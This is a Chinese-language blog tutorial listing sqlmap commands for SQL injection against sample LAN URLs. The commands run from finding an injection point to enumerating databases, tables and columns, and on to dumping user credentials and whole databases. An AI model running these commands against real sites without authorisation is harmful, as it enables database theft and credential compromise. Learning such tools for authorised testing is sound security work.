sqlmap注入工具使用命令大全
0x01 基本命令
sqlmap下载:https://github.com/sqlmapproject/sqlmap
sqlmap.py –update 更新sqlmap
sqlmap.py -h 查看帮助
sqlmap.py -u “http://192.168.0.158:8006/showproducts.php?id=13" 这里的-u参数就是注入点
sqlmap.py -u “http://192.168.0.240:8006/showproducts.php?id=13" –is-dba 当前用户权限 返回True的话为管理员
–dbs 列出所有数据库
–current-db 网站当前数据库
–users 查看数据库链接用户 %号分隔的话,是个公网ip 就可以随意访问
–current-user 当前数据库用户
–passwords 列出用户密码
–tables -D xycms 查表 -D 相当于 -database 相当于数据库
–tables -D xycms –count 多加的参数相当于统计一下,表里面的行数
–columns -T manage_user -D xycms 列字段,-T 表名 -D 数据库名
–dump -C m_name,m_pwd -T manage_user -D xycms 下载数据 -C 列名 逗号分隔
–dump-all 转存DBMS数据库所有表项目
–level 测试等级(1-5),默认为1
基本的步骤:读取数据库—>读取表—->读取表的列—->获取内容
-D 指定数据库
-T 指定表
-C 指定列
–dbms=mysql 指定数据库为mysql,也可以是 oracle mssql
以下四个需要管理员权限:
–users 枚举所有用户
–passwords 枚举所有用户密码
–roles 列出数据库管理员角色
–privileges 列出数据库管理员权限
列举数据库系统的架构:
sqlmap.py -u “http://192.168.0.240:8006/showproducts.php?id=13" –schema –batch –exclude-sysdbs
–schema 是列系统架构
–batch 默认选项执行,不需要再提示选项
–exclude-sysdbs 排除系统数据库
0x02 参数:–level
级别越高,检测的东西越多,确保全面性用高级别,一般用3,这个是从0开始,0-4,5个级别)
共有五个等级,默认为1,sqlmap使用的payload可以在xml/payloads.xml中看到,
你也可以根据相应的格式添加自己的payload。
这个参数不仅影响使用哪些payload同时也会影响测试的注入点,
GET和POST的数据都会测试,
HTTP Cookie在level为2的时候就会测试,
HTTP User-Agent/Referer头在level为3的时候就会测试。
总之在你不确定哪个payload或者参数为注入点的时候,为了保证全面性,建议使用高的level值。
原创文章,作者: Admin ,转载请注明出处:https://secvery.com/2421.html
评论列表(1条)
值得学习 正好需要